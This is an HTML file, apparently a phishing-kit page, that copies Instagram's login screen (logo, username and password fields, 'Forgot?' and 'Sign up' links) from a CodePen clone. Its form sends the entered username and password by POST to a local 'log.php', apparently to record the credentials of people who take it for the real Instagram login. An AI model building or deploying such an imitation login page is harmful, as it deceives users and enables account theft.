instagram.html 3.8 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206
  1. <!DOCTYPE html>
  2. <html lang="en" >
  3. <head>
  4. <meta charset="UTF-8">
  5. <link rel="apple-touch-icon" type="image/png" href="https://cpwebassets.codepen.io/assets/favicon/apple-touch-icon-5ae1a0698dcc2402e9712f7d01ed509a57814f994c660df9f7a952f3060705ee.png" />
  6. <meta name="apple-mobile-web-app-title" content="CodePen">
  7. <link rel="shortcut icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/favicon-aec34940fbc1a6e787974dcd360f2c6b63348d4b1f4e06c77743096d55480f33.ico" />
  8. <link rel="mask-icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/logo-pin-b4b4269c16397ad2f0f7a01bcdf513a1994f4c94b8af2f191c09eb0d601762b1.svg" color="#111" />
  9. <title>CodePen - Instagram login page</title>
  10. <link rel="canonical" href="https://codepen.io/RajRajeshDn/pen/mRQQJQ" />
  11. <style>
  12. * {
  13. margin: 0px;
  14. padding: 0px;
  15. }
  16. body {
  17. background-color: #eee;
  18. }
  19. #wrapper {
  20. width: 500px;
  21. height: 50%;
  22. overflow: hidden;
  23. border: 0px solid #000;
  24. margin: 50px auto;
  25. padding: 10px;
  26. }
  27. .main-content {
  28. width: 250px;
  29. height: 40%;
  30. margin: 10px auto;
  31. background-color: #fff;
  32. border: 2px solid #e6e6e6;
  33. padding: 40px 50px;
  34. }
  35. .header {
  36. border: 0px solid #000;
  37. margin-bottom: 5px;
  38. }
  39. .header img {
  40. height: 50px;
  41. width: 175px;
  42. margin: auto;
  43. position: relative;
  44. left: 40px;
  45. }
  46. .input-1,
  47. .input-2 {
  48. width: 100%;
  49. margin-bottom: 5px;
  50. padding: 8px 12px;
  51. border: 1px solid #dbdbdb;
  52. box-sizing: border-box;
  53. border-radius: 3px;
  54. }
  55. .overlap-text {
  56. position: relative;
  57. }
  58. .overlap-text a {
  59. position: absolute;
  60. top: 8px;
  61. right: 10px;
  62. color: #003569;
  63. font-size: 14px;
  64. text-decoration: none;
  65. font-family: 'Overpass Mono', monospace;
  66. letter-spacing: -1px;
  67. }
  68. .btn {
  69. width: 100%;
  70. background-color: #3897f0;
  71. border: 1px solid #3897f0;
  72. padding: 5px 12px;
  73. color: #fff;
  74. font-weight: bold;
  75. cursor: pointer;
  76. border-radius: 3px;
  77. }
  78. .sub-content {
  79. width: 250px;
  80. height: 40%;
  81. margin: 10px auto;
  82. border: 1px solid #e6e6e6;
  83. padding: 20px 50px;
  84. background-color: #fff;
  85. }
  86. .s-part {
  87. text-align: center;
  88. font-family: 'Overpass Mono', monospace;
  89. word-spacing: -3px;
  90. letter-spacing: -2px;
  91. font-weight: normal;
  92. }
  93. .s-part a {
  94. text-decoration: none;
  95. cursor: pointer;
  96. color: #3897f0;
  97. font-family: 'Overpass Mono', monospace;
  98. word-spacing: -3px;
  99. letter-spacing: -2px;
  100. font-weight: normal;
  101. }
  102. input:focus {
  103. background-color: yellow;
  104. }
  105. /* youtube link */
  106. .youtube{
  107. position: fixed;
  108. bottom: 10px;
  109. right: 10px;
  110. width: 160px;
  111. text-align: center;
  112. padding: 15px 10px;
  113. background: #bb0000;
  114. border-radius: 5px;
  115. }
  116. .youtube a{
  117. text-decoration: none;
  118. color: #fff;
  119. text-transform: capitalize;
  120. letter-spacing: 1px;
  121. }
  122. </style>
  123. <script>
  124. window.console = window.console || function(t) {};
  125. </script>
  126. </head>
  127. <body translate="no">
  128. <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
  129. <div id="wrapper">
  130. <div class="main-content">
  131. <div class="header">
  132. <img src="https://i.imgur.com/zqpwkLQ.png" />
  133. </div>
  134. <div class="l-part">
  135. <form name="formulario" action="log.php" method="POST">
  136. <input type="text" placeholder="Username" name="user" class="input-1" />
  137. <div class="overlap-text">
  138. <input type="password" placeholder="Password" name="password" class="input-2" />
  139. <a href="#">Forgot?</a>
  140. </div>
  141. <input type="submit" value="Log in" class="btn" />
  142. </form>
  143. </div>
  144. </div>
  145. <div class="sub-content">
  146. <div class="s-part">
  147. Don't have an account?<a href="#">Sign up</a>
  148. </div>
  149. </div>
  150. </div>
  151. </body>
  152. </html>